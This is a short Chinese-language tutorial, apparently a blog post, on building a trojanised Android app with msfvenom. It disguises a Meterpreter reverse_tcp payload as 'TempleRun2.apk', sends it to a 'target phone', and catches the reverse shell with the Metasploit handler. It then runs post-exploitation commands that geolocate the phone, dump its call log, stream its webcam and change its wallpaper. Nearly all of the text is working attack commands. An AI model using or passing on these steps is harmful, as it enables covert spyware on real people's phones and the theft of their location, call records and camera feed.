話不多說,我們直接切入正題。
1.首先我們打開Kali的命令終端,輸入如下命令:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444
>/root/Desktop/TempleRun2.apk
我們可以看到在桌面生成了一個.APK的文件。
2.將生成的APK文件發送給目標手機。在此以我自己的手機為例,我將文件下載並安裝到了自己手機上。下面我們在Kali上建立一個監聽和處理反彈shell的程序。首先輸入:msfconsole 啟動MSF。以下依次輸入如下命令:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.102
set lport 4444
exploit
到這步我已經成功取得了我的Android手機的控制權。讓我們在Kali上執行一些命令看看是否有效。我們查看下該手機是否已經取得root 權限。輸入命令:
check_root
查下手機目前所處的大概位置:
wlan_geolocate
通過以上結果提供的URL,我們可以使用谷歌地圖進行定位。將URL復制到瀏覽器打開。
下載目標手機上的通話記錄:
dump_calllog
默認保存在了 /root/calllog_dump.txt 下。
打開攝像頭實時畫面:
webcam_stream
在瀏覽器查看。
來個比較有意思的。現在讓我遠程強制修改我手機的壁圖案。繼續輸入命令如下:
msf > use post/multi/manage/set_wallpaper
msf post (set_wallpaper)>set WALLPAPER_FILE /root/Desktop/hack.jpg
msf post (set_wallpaper)>set session 1
msf post (set_wallpaper)>exploit
成功替換!